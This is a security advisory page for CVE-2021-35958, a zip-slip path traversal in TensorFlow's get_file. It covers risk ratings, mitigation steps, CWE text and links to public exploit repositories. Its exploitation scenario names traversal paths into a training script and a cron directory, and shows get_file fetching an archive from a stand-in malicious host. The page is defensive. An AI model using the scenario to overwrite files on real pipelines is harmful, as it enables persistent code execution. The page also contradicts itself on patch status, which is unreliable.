CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite
CRITICAL PoC AVAILABLEAny ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
What is the risk?
Critical (CVSS 9.1). No authentication or user interaction required — attackers need only serve a malicious archive at a URL fetched by the ML pipeline. The file overwrite primitive elevates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, making the attack surface broader than in typical application CVEs. Vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| TensorFlow | pip | — | No patch |
Do you use TensorFlow? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
-
Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review.
-
Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.
-
Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
-
Implement file integrity monitoring on model artifacts and training data directories.
-
For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2021-35958?
Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
Is CVE-2021-35958 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.
How to fix CVE-2021-35958?
1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes. 2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review. 3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names. 4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories. 5. Implement file integrity monitoring on model artifacts and training data directories. 6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
What systems are affected by CVE-2021-35958?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.
What is the CVSS score for CVE-2021-35958?
CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.86%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0010.002 Data AML.T0011.001 Malicious Package AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives
Exploitation Scenario
An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event — achieving persistent code execution on ML infrastructure with the pipeline's credentials and network access.
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H References
- docs.python.org/3/library/tarfile.html 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/README.md 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/utils/data_utils.py 3rd Party
- keras.io/api/ 3rd Party
- vuln.ryotak.me/advisories/52 3rd Party
- github.com/miguelc49/CVE-2021-35958-1 Exploit
- github.com/miguelc49/CVE-2021-35958-2 Exploit
Timeline
Related Vulnerabilities
CVE-2020-15196 9.9 TensorFlow: heap OOB read in sparse/ragged count ops
Same package: tensorflow CVE-2020-15205 9.8 TensorFlow: heap overflow in StringNGrams, ASLR bypass
Same package: tensorflow CVE-2020-15208 9.8 TFLite: OOB read/write via tensor dimension mismatch
Same package: tensorflow CVE-2019-16778 9.8 TensorFlow: heap overflow in UnsortedSegmentSum op
Same package: tensorflow CVE-2022-23587 9.8 TensorFlow: integer overflow in Grappler enables RCE
Same package: tensorflow